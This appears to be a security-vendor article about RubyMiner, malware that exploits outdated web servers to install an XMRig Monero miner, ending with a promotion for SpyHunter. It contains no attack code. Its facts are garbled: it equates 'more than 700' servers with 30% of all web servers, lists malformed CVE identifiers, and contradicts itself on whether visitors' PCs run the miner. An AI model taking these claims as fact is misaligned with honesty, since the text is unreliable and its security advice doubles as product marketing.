What is RubyMiner?

RubyMiner is a new malware program that attacks out-of-date web servers globally to install a Monero cryptocurrency miner to generate illegal revenue. Our malware experts at say that this stealthy program mainly targets Linux and Windows servers in the United States, Germany, United Kingdom, Norway, and Sweden, but it does not spare any other countries really. As a matter of fact, analysts say that the attacks started on January 9, 2018, and 30% of web servers in the world have been targeted to find vulnerabilities, including Transneft, a Russian oil pipeline operator. Ever since cryptocurrencies started to rise, mining and the need for mining have been growing. Numerous malware programs have emerged to conduct illegal mining on unsuspecting users' personal computers globally. But cyber crooks stepped it up a notch and started to attack and exploit web servers as well in hope of more profit. This is how the official Blackberry site was also compromised to mine through visitors' computers in another attack. All in all, if you realize that your computer is running slow and your CPU or GPU is working on near 100% power, you should be suspicious because it may indicate the operations of such a miner. Nevertheless, in this case you cannot remove RubyMiner as it operates through web servers; in other words, there is nothing to remove from your individual PC.

Where does RubyMiner come from?

As a matter of fact, this malware infection is not a program that you could normally download from a spam e-mail, a shady torrent or freeware site, or any other suspicious websites as it could usually happen in case of other infections. This infection seems to be used mostly in attacks against web servers by its authors. While most of its predecessors mainly targeted personal computers, these attackers saw bigger opportunity in servers. This also means that you cannot actually prevent such a malicious attack from happening if you happen to visit any of the compromised websites on corrupted servers. However, you would definitely notice the operations of this miner as the computing power it may need could seriously drain your PC's resources. We believe that the only possible defense against this malware is to have a trustworthy and up-to-date anti-malware program installed on your computer to protect it from such illegal acts.

How does RubyMiner work?

As we have already explained, this malware infection targets web servers and their vulnerabilities to install an open-source Monero miner called XMRig. It seems that more than 700 web servers have been attacked, 30% of web servers world wide. Yet, these criminals may not have hit the jackpot with their program as it seems to have generated as little as $540 on the first day indicated by their wallet address.

This malware is programmed to scan the targeted web servers for out-of-date software and then, the malware exploits the following old vulnerabilities:

  • CVE-2013-015
  • CVE-2013-4878
  • CVE-2012-1823
  • CVE-2012-2335
  • CVE-2012-2311
  • CVE-2012-2336
  • CVE-2005-267

As you can clearly see, these are several years old vulnerabilities, which also means that the chance for these cyber criminals to find servers with these old vulnerabilities is obviously quite low. If they used more recent ones, they could make more money out of their illegal mining. But let us not give good tips to these criminals.

This malicious program is coded to download the whole payload every hour instead of running the mining process hourly automatically. This  can also used as a kill switch if the malware were to be detected on a server. A lot of websites use the robots.txt file to instruct web robots about the site. If these criminals want, they can modify this file on the compromised web server not to download the payload anymore. Thus, in the next minute, all the computers connecting to the server and wanting to download this file would receive it without the crypto miner. This whole mining process can seriously slow your system down, which can make your application windows to load slower and all kinds of other distractions. If you want to protect your computer against such illegal activities, you should install a proper security program.

How can I delete RubyMiner?

When we talk about the removal of  RubyMiner, we also talk about XMRig miner since this malware infection has to be deleted as well. However, this can only be done on the compromised web servers by their administrators. Thus, we advise you to download and install a reliable anti-malware program, such as SpyHunter, as soon as possible. This way you can give your PC the best possible automatic protection against all kinds of malicious attacks and potential threats as well. Of course, you need to keep this security software always up-to-date, just like all other programs on your computer, including your Windows operating system. As you can clearly see now, cyber criminals can easily exploit outdated software bugs and vulnerabilities, which can lead to illegal mining as well as stealing sensitive information from your computer. Keep your PC protected to save yourself from such nightmares.

100% FREE spyware scan and
tested removal of RubyMiner*

Leave a Comment

Enter the numbers in the box to the right *